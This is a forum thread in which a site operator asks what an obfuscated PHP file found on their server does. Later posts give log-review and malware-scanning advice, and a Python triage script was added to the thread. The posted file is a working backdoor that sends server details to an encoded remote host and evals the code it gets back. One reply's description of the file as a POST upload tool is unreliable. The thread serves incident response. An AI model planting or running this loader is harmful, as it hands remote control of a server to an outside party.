The Community Forums


What do these commands do?

Discussion in 'Security' started by hostmasti, Nov 2, 2011.

  1. hostmasti

    hostmasti Registered

    Please let us know what exactly these commands execute, as we have found this unknown file uploaded to the server.

    Code:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="20742f95bc39e28618c5dbedc1aaf0e6") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
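
Added example (not part of the original thread or any poster's code): a static triage sketch in Python that decodes the `base64_decode("...")` literals in the posted file and flags variables filled by `file_get_contents` or `curl_exec` and then passed to `eval`, without running the PHP. The function names and regex heuristics are assumptions of this example; `SAMPLE` is an excerpt of the code posted above.

```python
import base64
import re

# Excerpt of the PHP posted above: the statements that build the URL and eval
# the response (the request-parameter override between them is left out).
SAMPLE = r'''$f=base64_decode("cGhwZmVlZC5ydQ==");if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}'''

# Heuristic patterns (assumptions of this example, not a PHP parser).
B64_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
FETCH = re.compile(r'\$(\w+)\s*=\s*(file_get_contents|curl_exec)\s*\(')
EVAL = re.compile(r'\beval\s*\(\s*\$(\w+)\s*\)')
URL_SCHEMES = ("http://", "https://")


def decode_literals(php):
    """Decode every base64_decode("...") string literal, in source order."""
    out = []
    for m in B64_CALL.finditer(php):
        try:
            raw = base64.b64decode(m.group(2), validate=True)
            out.append(raw.decode("utf-8", "replace"))
        except ValueError:  # bad padding or alphabet: keep a marker
            out.append(None)
    return out


def remote_eval_vars(php):
    """(variable, fetch function) pairs where a fetched value reaches eval()."""
    fetched = {m.group(1): m.group(2) for m in FETCH.finditer(php)}
    used = {m.group(1) for m in EVAL.finditer(php)}
    return sorted((v, fetched[v]) for v in used if v in fetched)


def candidate_urls(php):
    """Join decoded scheme prefixes with decoded host fragments for log review."""
    lits = [s for s in decode_literals(php) if s]
    prefixes = [s for s in lits if s.startswith(URL_SCHEMES)]
    hosts = [s for s in lits if not s.startswith(URL_SCHEMES)]
    return [p + h for p in prefixes for h in hosts]


if __name__ == "__main__":
    print(decode_literals(SAMPLE))
    print(remote_eval_vars(SAMPLE))
    print(candidate_urls(SAMPLE))
```

The joined prefixes and host fragment can be searched for in outbound proxy, DNS or firewall logs to see whether the server ever contacted them.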
     
  2. morissette

    morissette Well-Known Member

    That is malicious and used to upload files via POST requests. Please contact your host's security/abuse department for investigation.

    OR

    Follow these steps:

    1. Stat the file: `stat /home/user/public_html/somefile.php`
    2. Save the timestamp
    3. Based on the mtime and ctime, review the domlogs, messages and cPanel logs

    The above will typically tell you how the file was introduced to the account.
     
  3. storminternet

    storminternet Well-Known Member

    Hello,

    You can further scan the offended account with clamscan or maldet if you have root privileges, or you can also ask your host to do so.
     
  4. hostmasti

    hostmasti Registered

    I have manually deleted the file, but now how can I go through the above steps?
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    You cannot do those steps when you've removed the file. In the future, you should try to obtain as much information about the file for reviewing logs and processes before removing the file.
     